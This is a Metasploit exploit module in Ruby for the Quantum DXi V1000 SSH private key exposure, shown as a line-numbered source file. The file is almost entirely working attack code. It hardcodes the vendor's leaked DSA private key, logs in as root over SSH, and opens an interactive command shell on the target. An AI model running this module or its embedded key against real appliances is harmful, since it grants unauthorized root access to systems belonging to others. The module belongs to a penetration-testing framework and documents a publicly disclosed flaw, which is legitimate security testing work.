Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
require 'net/ssh'
7
require 'net/ssh/command_stream'
8

9
class MetasploitModule < Msf::Exploit::Remote
10
  Rank = ExcellentRanking
11

12
  include Msf::Exploit::Remote::SSH
13

14
  def initialize(info = {})
15
    super(
16
      update_info(
17
        info,
18
        {
19
          'Name' => 'Quantum DXi V1000 SSH Private Key Exposure',
20
          'Description' => %q{
21
            Quantum ships a public/private key pair on DXi V1000 2.2.1 appliances that
22
            allows passwordless authentication to any other DXi box. Since the key is
23
            easily retrievable, an attacker can use it to gain unauthorized remote
24
            access as root.
25
          },
26
          'Platform' => 'unix',
27
          'Arch' => ARCH_CMD,
28
          'Privileged' => true,
29
          'Targets' => [ [ 'Universal', {} ] ],
30
          'Payload' => {
31
            'Compat' => {
32
              'PayloadType' => 'cmd_interact',
33
              'ConnectionType' => 'find'
34
            }
35
          },
36
          'Author' => 'xistence <xistence[at]0x90.nl>', # Discovery, Metasploit module
37
          'License' => MSF_LICENSE,
38
          'References' => [
39
            ['PACKETSTORM', '125755']
40
          ],
41
          'DisclosureDate' => '2014-03-17',
42
          'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },
43
          'DefaultTarget' => 0,
44
          'Notes' => {
45
            'Stability' => [CRASH_SAFE],
46
            'Reliability' => [REPEATABLE_SESSION],
47
            'SideEffects' => []
48
          }
49
        }
50
      )
51
    )
52

53
    register_options(
54
      [
55
        # Since we don't include Tcp, we have to register this manually
56
        Opt::RHOST(),
57
        Opt::RPORT(22)
58
      ], self.class
59
    )
60

61
    register_advanced_options(
62
      [
63
        OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),
64
        OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])
65
      ]
66
    )
67
  end
68

69
  # helper methods that normally come from Tcp
70
  def rhost
71
    datastore['RHOST']
72
  end
73

74
  def rport
75
    datastore['RPORT']
76
  end
77

78
  def do_login(user)
79
    opt_hash = ssh_client_defaults.merge({
80
      auth_methods: ['publickey'],
81
      port: rport,
82
      key_data: [ key_data ]
83
    })
84

85
    opt_hash.merge!(verbose: :debug) if datastore['SSH_DEBUG']
86
    begin
87
      ssh_socket = nil
88
      ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
89
        ssh_socket = Net::SSH.start(rhost, user, opt_hash)
90
      end
91
    rescue Rex::ConnectionError
92
      return nil
93
    rescue Net::SSH::Disconnect, ::EOFError
94
      print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"
95
      return nil
96
    rescue ::Timeout::Error
97
      print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"
98
      return nil
99
    rescue Net::SSH::AuthenticationFailed
100
      print_error "#{rhost}:#{rport} SSH - Failed authentication"
101
      return nil
102
    rescue Net::SSH::Exception => e
103
      print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"
104
      return nil
105
    end
106

107
    if ssh_socket
108

109
      # Create a new session from the socket, then dump it.
110
      conn = Net::SSH::CommandStream.new(ssh_socket)
111
      ssh_socket = nil
112

113
      return conn
114
    else
115
      return nil
116
    end
117
  end
118

119
  def exploit
120
    conn = do_login('root')
121
    if conn
122
      print_good "#{rhost}:#{rport} - Successful login"
123
      handler(conn.lsock)
124
    end
125
  end
126

127
  def key_data
128
    <<~EOF
129
      -----BEGIN DSA PRIVATE KEY-----
130
      MIIBugIBAAKBgQCEgBNwgF+IbMU8NHUXNIMfJ0ONa91ZI/TphuixnilkZqcuwur2
131
      hMbrqY8Yne+n3eGkuepQlBBKEZSd8xPd6qCvWnCOhBqhkBS7g2dH6jMkUl/opX/t
132
      Rw6P00crq2oIMafR4/SzKWVW6RQEzJtPnfV7O3i5miY7jLKMDZTn/DRXRwIVALB2
133
      +o4CRHpCG6IBqlD/2JW5HRQBAoGAaSzKOHYUnlpAoX7+ufViz37cUa1/x0fGDA/4
134
      6mt0eD7FTNoOnUNdfdZx7oLXVe7mjHjqjif0EVnmDPlGME9GYMdi6r4FUozQ33Y5
135
      PmUWPMd0phMRYutpihaExkjgl33AH7mp42qBfrHqZ2oi1HfkqCUoRmB6KkdkFosr
136
      E0apJ5cCgYBLEgYmr9XCSqjENFDVQPFELYKT7Zs9J87PjPS1AP0qF1OoRGZ5mefK
137
      6X/6VivPAUWmmmev/BuAs8M1HtfGeGGzMzDIiU/WZQ3bScLB1Ykrcjk7TOFD6xrn
138
      k/inYAp5l29hjidoAONcXoHmUAMYOKqn63Q2AsDpExVcmfj99/BlpQIUYS6Hs70u
139
      B3Upsx556K/iZPPnJZE=
140
      -----END DSA PRIVATE KEY-----
141
    EOF
142
  end
143
end
144

145